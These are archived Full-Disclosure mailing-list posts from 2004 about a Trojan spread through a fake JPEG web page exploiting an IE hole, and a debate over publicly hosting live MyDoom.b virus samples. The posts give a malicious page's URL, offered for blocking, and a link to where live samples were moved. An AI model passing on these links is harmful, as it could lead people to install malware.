To: Gadi Evron <[EMAIL PROTECTED]>, [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] another Trojan with the ADO hole? + a twist in the story
Date: 31 Jan 2004 14:24:21 -0600

--On Saturday, January 31, 2004 7:35 PM +0200 Gadi Evron 
<[EMAIL PROTECTED]> wrote:

> The past Trojan horses which spread this way took advantage of the fact
> web servers send an HTML 404 message if a file doesn't exist.
>
> The original sample - britney.jpg - was simply an html file itself, and
> using that fact, and IE loading it. It was combined with one of the
> latest exploits of the time (I don't think MS patched it yet), and
> downloaded the Trojan horses.
>
> This time around there is actually a picture on the web page, of a real
> honest to God girl. But in another frame.. the same story all over again.
>
> For blocking purposes, the (un-safe) URL is: http://ut.uk.to/cs.jpg .

Didn't work on my Titanium using Safari.  The girl 
was... uh... well-endowed.  :-)

Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
The University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




Re: [Full-Disclosure] MyDoom download info

2004-01-31 Thread Roland Dobbins
Please allow me to clarify - I merely intended to indicate that I know 
Dan to be a man of personal and professional integrity, no endorsement 
of the practice was intended, sorry for any confusion.

On Jan 31, 2004, at 2:54 PM, Nick FitzGerald wrote:

> Roland Dobbins <[EMAIL PROTECTED]> wrote:
> 
> > I know Dan Spisak personally, and can vouch for his honesty and
> > integrity.
> 
> And _you_ are???
> 
> It seems you largely missed the point.
> 
> ...
> 
> Anyway, it is interesting to know that Cisco employs people who think
> there is integrity in both publicly distributing viruses, and doing so
> after repackaging them with a "dropper" that makes them not immediately
> detectable.
> --
> Nick FitzGerald
> Computer Virus Consulting Ltd.
> Ph/FAX: +64 3 3529854
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-
Roland Dobbins <[EMAIL PROTECTED]> // 408.527.6376 voice


Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske
Nick FitzGerald wrote:

> I know most of you will not believe this because you so stupid you 
> already believe that live virus samples are _just_ information and 
> therefore _should_ be subject to "full disclosure" (this is a special 
> form of ignorance that very little empirical evidence seems able to 
> budge 

Before I make a judgement here, are you against publishing the virus in 
executable form that could be accidentally launched, or against 
publishing the virus in any form?

If the latter, then perhaps you might find other mailing lists with a 
more sympathetic audience. If the former, after consideration, I agree. 
Handling a live virus is akin to handling their real-world counterparts, 
and having some protection against accidentally launching it on a 
production system is a Good Thing. I've renamed mine to a non-executable 
 extension, and they're off my production boxes.



Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Ed Carp
On Sun, 1 Feb 2004, Nick FitzGerald wrote:

> of it will "escape" (we see this often).  And you want to subject the
> world to that threat because you want to spend hours and hours doing
> what has been done "well enough" in multiple professional security
> company labs for them to ship detection and repair utilities within
> minutes to an hour or two of first receiving a sample of it several
> days ago.  Get real...

This is just so arrogant as to be unreal.  And how do you suppose those
"experts" got to be that way?  You wouldn't happen to work in the field,
would you, Nick?



Re: [Full-Disclosure] MyDoom.b samples taken down

2004-01-31 Thread Kurt Weiske
Nick FitzGerald wrote:

> And save me the almost inevitable full-disclosure mantra BS replies!  
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

heh.



Re: [Full-Disclosure] MyDoom.b samples moved

2004-01-31 Thread mjcarter
>
> Nick FitzGerald wrote:
>
> > And save me the almost inevitable full-disclosure mantra
> BS replies!
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.netsys.com/full-disclosure-charter.html
>
> heh.
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html

Due to "popular demand" I've moved the files.

http://homepages.ihug.co.nz/~mjcarter/

You'll have to scroll to the bottom of the page and click on
a link.

Mike
